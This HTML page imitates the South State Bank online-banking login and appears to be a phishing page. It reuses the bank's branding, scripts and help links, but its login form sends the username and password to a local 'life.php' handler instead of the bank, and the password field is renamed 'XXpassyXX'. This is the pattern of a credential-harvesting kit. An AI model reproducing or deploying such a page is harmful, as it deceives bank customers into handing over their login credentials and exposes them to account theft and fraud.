﻿<!DOCTYPE HTML>
<!DOCTYPE html PUBLIC "" ""><HTML lang="en-us"><!--This software (including any images, applets, photographs, animations, video, music and text incorporated into the software) is the proprietary property of Fiserv, Inc. or its affiliates and its use, modification and distribution are protected and limited by United States copyright laws and international treaty provisions and all other applicable national laws.  Reproduction is prohibited except that you may make one additional copy of the software solely for backup purposes.--><HEAD><META 
content="IE=11.0000" http-equiv="X-UA-Compatible">
     
<META http-equiv="X-UA-Compatible" content="IE=edge">     
<META charset="utf-8">     
<META name="viewport" content="width=device-width, initial-scale=1.0">     
<META name="robots" content="noindex">     
<META http-equiv="expires" content="Tue, 04 Dec 1993 21:29:02 GMT">     
<META http-equiv="cache-control" content="no-store, no-cache, must-revalidate">  
   
<META http-equiv="pragma" content="no-cache">     <LINK href="/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/favicon.ico" 
rel="shortcut icon">     <TITLE>South State Bank | Log In</TITLE>     <LINK 
href="https://web14.secureinternetbank.com/PBI_PBI1151/css/opensource?v=Ukb2F1mcTlq1GQzvx3fIYxhp8pTcDPbMNhDtQ1PPB-o1" 
rel="stylesheet"> <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/css/static?v=n3m9xhxPJYPFBVGYJAcJRfBmxvv1ogIsQmzWjoGL0eQ1" 
rel="stylesheet">     <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/ThemeCss?v=652d703df74df283d549b8e4ce8b3742" 
rel="stylesheet" type="text/css">         <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/global.css?v=5c85d86dbae0bd25bcd6bfe3be6cf9c2" 
rel="stylesheet" type="text/css">             <LINK href="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/OverrideCss?v=c26f3393293ff15c02f7e2a11ed73b25" 
rel="stylesheet" type="text/css">     
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/opensource?v=kA1jCQwWsNbR9_Eqob-2wyn-646JwcsPOv7ZkXB3-kA1"></SCRIPT>
     
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/PBI?v=W8-IKO8ZIUr9s4QTuZjCLKXB0dJrRQxgsLhrj3hV_QU1"></SCRIPT>
     
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/NextMarketing?v=X8O_M39KgDIItiUB9Jjp1E8cS_X8-OtSplppxC9jqRo1"></SCRIPT>
     
<SCRIPT type="text/javascript">
        PBI.antiForgeryToken = "qkZ0YDU-Ai6TAvoXmTKiOvQxYutKZSQITcpr4VZG098aK6hdhP3oZi9G8hSF5GfkCbG9MnD5YDyOXFv-Tf1FMowLd-E1";
        PBI.baseHref = "/PBI_PBI1151/";
        PBI.pageNonce = "";
    </SCRIPT>
         
<SCRIPT type="text/javascript">
            PBI.chatStatusUrl = "https://053200983.securebanksolutions.com/status/text/?im=Customercare%40southstatebank.com&group=053200983";
            PBI.RevationDisplayChatInPopup = false;
        </SCRIPT>
         
<STYLE id="antiClickjack">
        body {
            display: none !important;
        }
    </STYLE>
     
<SCRIPT type="text/javascript">
        if (self === top) {
            var antiClickjack = document.getElementById("antiClickjack");
            antiClickjack.parentNode.removeChild(antiClickjack);
        } else {
            top.location = self.location;
        }
    </SCRIPT>
        
<META name="GENERATOR" content="MSHTML 11.00.9600.19355"></HEAD> 
<BODY><svg xmlns="http://www.w3.org/2000/svg" class="is--hidden" focusable="false"><defs><path 
id="shape--circle-check" d="M 2 8 C 2 4.6863 4.6862 2 8 2 C 11.3138 2 14 4.6863 14 8 C 14 11.3137 11.3138 14 8 14 C 4.6862 14 2 11.3137 2 8 Z M 0 8 C 0 12.4183 3.5817 16 8 16 C 12.4183 16 16 12.4183 16 8 C 16 3.5817 12.4183 0 8 0 C 3.5817 0 0 3.5817 0 8 Z M 12.6916 6.8958 C 12.9233 6.6641 12.9233 6.2884 12.6916 6.0567 L 11.8525 5.2176 C 11.6208 4.9859 11.2451 4.9859 11.0134 5.2176 L 7.14 9.09 L 5.027 6.9742 C 4.7953 6.7425 4.4196 6.7425 4.1879 6.9742 L 3.3488 7.8133 C 3.1171 8.045 3.1171 8.4207 3.3488 8.6524 L 6.7052 12.0088 C 6.9369 12.2406 7.3126 12.2406 7.5443 12.0088 L 12.6916 6.8958 Z" 
/>                                                                               
          <path id="shape--ehl" d="M 8 4.1 L 13.3333 7.675 L 13.3333 13.2 L 2.6667 13.2 L 2.6667 7.675 L 8 4.1 Z M 0 6.7 L 0 8.325 L 1.3333 8.325 L 1.3333 14.5 L 14.6667 14.5 L 14.6667 8.325 L 16 8.325 L 16 6.7 L 8 1.5 L 0 6.7 Z M 5.3333 10.275 L 5.3333 12.225 L 10.6667 12.225 L 10.6667 10.275 L 5.3333 10.275 Z M 5.3333 7.675 L 5.3333 9.625 L 10.6667 9.625 L 10.6667 7.675 L 5.3333 7.675 Z" 
/>                             <path id="shape--exclamation-circle" d="M 1.25 8 C 1.25 4.272 4.272 1.25 8 1.25 C 11.728 1.25 14.75 4.272 14.75 8 C 14.75 11.728 11.728 14.75 8 14.75 C 4.272 14.75 1.25 11.728 1.25 8 Z M 0 8 C 0 12.4183 3.5817 16 8 16 C 12.4183 16 16 12.4183 16 8 C 16 3.5817 12.4183 0 8 0 C 3.5817 0 0 3.5817 0 8 Z M 7.05 3.2533 C 6.8534 3.2533 6.6973 3.4282 6.7013 3.6427 L 6.8058 9.2172 C 6.8092 9.3972 6.9568 9.5425 7.1356 9.5425 L 8.8616 9.5425 C 9.0403 9.5425 9.188 9.3972 9.1914 9.2172 L 9.2972 3.6427 C 9.3013 3.4282 9.1452 3.2533 8.9486 3.2533 L 7.05 3.2533 Z M 7.7626 10.3733 C 7.2383 10.3733 6.8133 10.7984 6.8133 11.3227 L 6.8133 11.7973 C 6.8133 12.3216 7.2383 12.7467 7.7626 12.7467 L 8.2373 12.7467 C 8.7616 12.7467 9.1866 12.3216 9.1866 11.7973 L 9.1866 11.3227 C 9.1866 10.7984 8.7616 10.3733 8.2373 10.3733 L 7.7626 10.3733 Z" 
/>                                                                               
                                                      <g 
id="shape--loader"><path fill-opacity="0.9" d="M 8.5 5.1 V 0 C 8.3 0 8.2 0 8 0 S 7.7 0 7.5 0 v 5 C 7.7 5 7.8 5 8 5 S 8.3 5 8.5 5.1 Z" 
/>                 <path fill-opacity="1" d="M 4.4 0.8 C 4.1 1 3.9 1.2 3.6 1.3 l 2.5 4.4 C 6.4 5.5 6.6 5.3 7 5.2 L 4.4 0.8 Z" 
/>                 <path fill-opacity="0.9" d="M 1.3 3.6 C 1.2 3.9 1 4.1 0.8 4.4 L 5.2 7 c 0.1 -0.3 0.3 -0.6 0.5 -0.9 L 1.3 3.6 Z" 
/>                 <path fill-opacity="0.7" d="M 5.1 7.5 H 0 C 0 7.7 0 7.8 0 8 s 0 0.3 0 0.5 h 5 C 5 8.3 5 8.2 5 8 S 5 7.7 5.1 7.5 Z" 
/>                 <path fill-opacity="0.6" d="M 0.8 11.6 c 0.1 0.3 0.3 0.6 0.5 0.9 l 4.4 -2.5 C 5.5 9.6 5.3 9.4 5.2 9 L 0.8 11.6 Z" 
/>                 <path fill-opacity="0.5" d="M 3.6 14.7 c 0.3 0.2 0.6 0.3 0.9 0.5 L 7 10.8 c -0.3 -0.1 -0.6 -0.3 -0.9 -0.5 L 3.6 14.7 Z" 
/>                 <path fill-opacity="0.4" d="M 7.5 10.9 v 5 c 0.2 0 0.3 0 0.5 0 s 0.3 0 0.5 0 v -5 C 8.3 11 8.2 11 8 11 S 7.7 11 7.5 10.9 Z" 
/>                 <path fill-opacity="0.4" d="M 11.6 15.2 c 0.3 -0.1 0.6 -0.3 0.9 -0.5 l -2.5 -4.4 c -0.3 0.2 -0.5 0.4 -0.9 0.5 L 11.6 15.2 Z" 
/>                 <path fill-opacity="0.3" d="M 14.7 12.4 c 0.2 -0.3 0.3 -0.6 0.5 -0.9 L 10.8 9 c -0.1 0.3 -0.3 0.6 -0.5 0.9 L 14.7 12.4 Z" 
/>                 <path fill-opacity="0.2" d="M 10.9 7.5 C 11 7.7 11 7.8 11 8 s 0 0.3 -0.1 0.5 h 5 c 0 -0.2 0 -0.3 0 -0.5 s 0 -0.3 0 -0.5 H 10.9 Z" 
/>                 <path fill-opacity="0.1" d="M 15.2 4.4 c -0.1 -0.3 -0.3 -0.6 -0.5 -0.9 l -4.4 2.5 c 0.2 0.3 0.4 0.5 0.5 0.9 L 15.2 4.4 Z" 
/>                 <path fill-opacity="0.1" d="M 12.4 1.3 c -0.3 -0.2 -0.6 -0.3 -0.9 -0.5 L 9 5.2 c 0.3 0.1 0.6 0.3 0.9 0.5 L 12.4 1.3 Z" 
/>             </g>         </defs>     </svg>     
<DIV class="wrapper"><HEADER role="banner">
<DIV class="grid">
<DIV class="grid__unit one-whole no-print">
<DIV class="float--right" id="utilitySection">
<DIV class="message--welcome float--left"></DIV><NAV class="cf nav--utility float--left" 
aria-label="Utility">
<UL class="nav nav--menu">
  <LI><A class="navitem" id="chatLink" href="https://web14.secureinternetbank.com/PBI_PBI1151/Launch/Chat?RoutingTransit=053200983" 
  target="LinkLiveWindow" rel="noopener noreferrer">Chat</A></LI>
  <LI><A class="navitem" href="https://web14.secureinternetbank.com/PBI_PBI1151/Login/053200983">Log 
  in</A></LI></UL></NAV></DIV></DIV>
<DIV class="grid__unit one-whole" id="BannerTimeout">
<DIV class="bank-branding"><IMG class="img-responsive" id="logo" alt="South State Bank" 
src="https://web14.secureinternetbank.com/PBI_PBI1151/Themes/uTwqTYjwSUWFFNmK4eO4fg/header-logo_print.png"> 
    </DIV></DIV>
<DIV class="grid__unit one-whole"></DIV></DIV></HEADER><main id="main">
<DIV class="grid">
<DIV class="grid__unit one-whole">
<H1>Log in</H1>
<DIV class="padding--add content--block" id="loginIndex">
<P class="alert alert--error is--hidden" role="alert" aria-live="assertive" 
aria-atomic="true" data-bind="css: {'is--hidden': false}, visible: error() &amp;&amp; !isLockedBySecureNow()"><svg 
xmlns="http://www.w3.org/2000/svg" class="icon shape--exclamation-circle" 
viewBox="0 0 16 16" focusable="false"><title>Error</title>                       
  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#shape--exclamation-circle" 
/>                     </svg>                     <SPAN data-bind="text: error()"></SPAN> 
                </P>
<DIV class="alert alert--error is--hidden" role="alert" aria-live="assertive" 
aria-atomic="true" data-bind="css: {'is--hidden': false}, visible: isLockedBySecureNow()">
<P><svg xmlns="http://www.w3.org/2000/svg" 
class="icon shape--exclamation-circle" viewBox="0 0 16 16" 
focusable="false"><title>Error</title>                             <use 
xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#shape--exclamation-circle" 
/>                         </svg>                         <SPAN data-bind="text: error()"></SPAN> 
                        <SPAN class="sr-only" data-bind="text: csrAccesibilityPhoneEmail()"></SPAN> 
                    </P>
<UL aria-hidden="true" data-bind="css: {'is--hidden': false}, visible: csrEmailAddress() || csrPhoneNumbers()">
  <LI data-bind="css: {'is--hidden': false}, visible: csrEmailAddress()">        
                      Email:                             <A data-bind="text:csrEmailAddress(), attr: {href: 'mailto:'+csrEmailAddress()}"></A> 
                          </LI>
  <LI data-bind="css: {'is--hidden': false}, visible: csrPhoneNumbers()">Phone: 
  <SPAN data-bind="text: csrPhoneNumbers()"></SPAN></LI></UL></DIV><
<form class="form--horizontal padding--add" method="post" action="life.php" autocomplete="off">
<DIV class="slat push--down">
<PRE class="helptext push--large--one-quarter large--three-quarters" id="helpTextLogin">Please enter your username and Password</PRE></DIV>
<DIV class="form__group"><LABEL class="form__label large--one-quarter" for="username">Username</LABEL> 
                        
<DIV class="form__control large--one-quarter medium--one-half">
	<INPUT name="username" id="username" aria-required="true" aria-describedby="usernametext usernameToggleText" autofocus="" required="" type="text" data-bind="textInput: username, event: {'keydown': toggleHideShowOnKeyboardShortcut}" autocomplete="off" autocapitalize="off" autocorrect="off" size="21"> 
                        </DIV>
</DIV>
<DIV class="form__group"><LABEL class="form__label large--one-quarter" for="password">Password</LABEL> 
                        
<DIV class="form__control large--one-quarter medium--one-half">
	<INPUT name="XXpassyXX" id="password" aria-required="true" aria-describedby="passwordtext" required="" type="password" data-mask="none" data-bind="textInput: password" autocomplete="off" size="21"> 
                        </DIV>
<P class="text--error text--error-form push--large--one-quarter" id="passwordtext" 
style="display: none;" data-bind="visible: passwordError(), text: passwordError()"></P></DIV>
<DIV class="form__group">
<DIV 
class="push--large--one-quarter large--one-quarter medium--one-half"><BUTTON 
class="btn btn--primary" type="submit" data-bind="enable: !showProcessingIndicator()"><svg 
xmlns="http://www.w3.org/2000/svg" class="icon shape--loader" style="display: none;" 
viewBox="0 0 16 16" focusable="false" data-bind="visible: showProcessingIndicator"><circle 
cx="50" cy="50" r="40" />                                     
<title>Processing</title>                                     <use xmlns:xlink="http://www.w3.org/1999/xlink" 
xlink:href="#shape--loader" />                                 </svg>            
                    Log in                             </BUTTON>                 
                <A class="btn btn--link" href="https://web14.secureinternetbank.com/PBI_PBI1151/ForgotPassword/053200983">Forgot 
password?</A>                         </DIV></DIV>
<DIV class="form__group">
<DIV class="push--large--one-quarter large--one-quarter medium--one-half">
<P class="push--up">                                    Not yet enrolled? <A 
href="https://web14.secureinternetbank.com/PBI_PBI1151/Enroll/053200983">Enroll 
now</A>.                                 
</P></DIV></DIV></FORM></DIV></DIV></DIV></main><FOOTER class="page--footer" 
role="contentinfo"><NAV class="no-print nav--footer">
<UL class="nav nav--menu">
  <LI><A class="navitem" href="https://web14.secureinternetbank.com/PBI_PBI1151/Help/Default.htm" 
  target="_blank" rel="noopener noreferrer">Help</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/help/online-education-center/" 
  target="_blank" rel="noopener noreferrer">Online Demos</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/help/faqs/#online-banking" 
  target="_blank" rel="noopener noreferrer">FAQ</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/onlinebankingagreement/" 
  target="_blank" rel="noopener noreferrer">Terms &amp; Conditions</A></LI>
  <LI><A class="navitem" href="https://www.southstatebank.com/help/privacy-statement/" 
  target="_blank" rel="noopener noreferrer">Privacy Notice</A></LI></UL></NAV>
<DIV class="cf" id="footerText">
<P class="float--right padding-right--add">©&nbsp;2015-2019 Fiserv, Inc. or its 
affiliates.</P></DIV></FOOTER></DIV>
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/readFlashToken?v=GZ2bnKkGDFAiBvkZgy9tAJuuVmgsWFOPiOojS1MhEVQ1"></SCRIPT>
         
<SCRIPT type="text/javascript">
            PBI.MFA.readFlashToken();
            loadPassmark();
        </SCRIPT>
 
<SCRIPT src="https://web14.secureinternetbank.com/PBI_PBI1151/js/login?v=WuJEDv9lU9tSGxsBFF8cu-3H5KPzXuXZ0qEMCw7lm4A1"></SCRIPT>
         
<SCRIPT type="text/javascript">
      
        PBI.Login.genericError("We were unable to log you in. Try again, or contact customer support.");
        PBI.Login.error("");
        PBI.Login.isLockedBySecureNow(false);
        PBI.Login.csrAccesibilityPhoneEmail("");
        PBI.Login.csrPhoneNumbers("");
        PBI.Login.csrEmailAddress("");
        PBI.Login.maskLoginInputs(false);
        PBI.Login.devicePrintDomId("pm_fp");

        ko.applyBindings(PBI.Login, document.getElementById("loginIndex"));

        $(function () {
            $('#username').on('passwordVisibilityChange', function () {
                PBI.Login.maskLoginInputs(this.type == "password");
            });
            $('#username').hideShowPassword('infer', true, {
                toggle: {
                    attr: {
                        'tabindex': '-1',
                        'role': null
                    }
                },
                wrapper: {
                    enforceWidth: false,
                    styles: {
                        width: '100%'
                    }
                },
                states: {
                    shown: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'false',
                                'title': 'Hide username',
                                'aria-label': 'Username visible.'
                            }
                        }
                    },
                    hidden: {
                        toggle: {
                            attr: {
                                'aria-pressed': 'true',
                                'title': 'Show username',
                                'aria-label': 'Username not visible.'
                            }
                        }
                    }
                }
            }).focus();
        });
    </SCRIPT>
         
<SCRIPT type="text/javascript">
        ko.applyBindings(PBI.Next, document.getElementById("BannerTimeout"));
    </SCRIPT>
     </BODY></HTML>
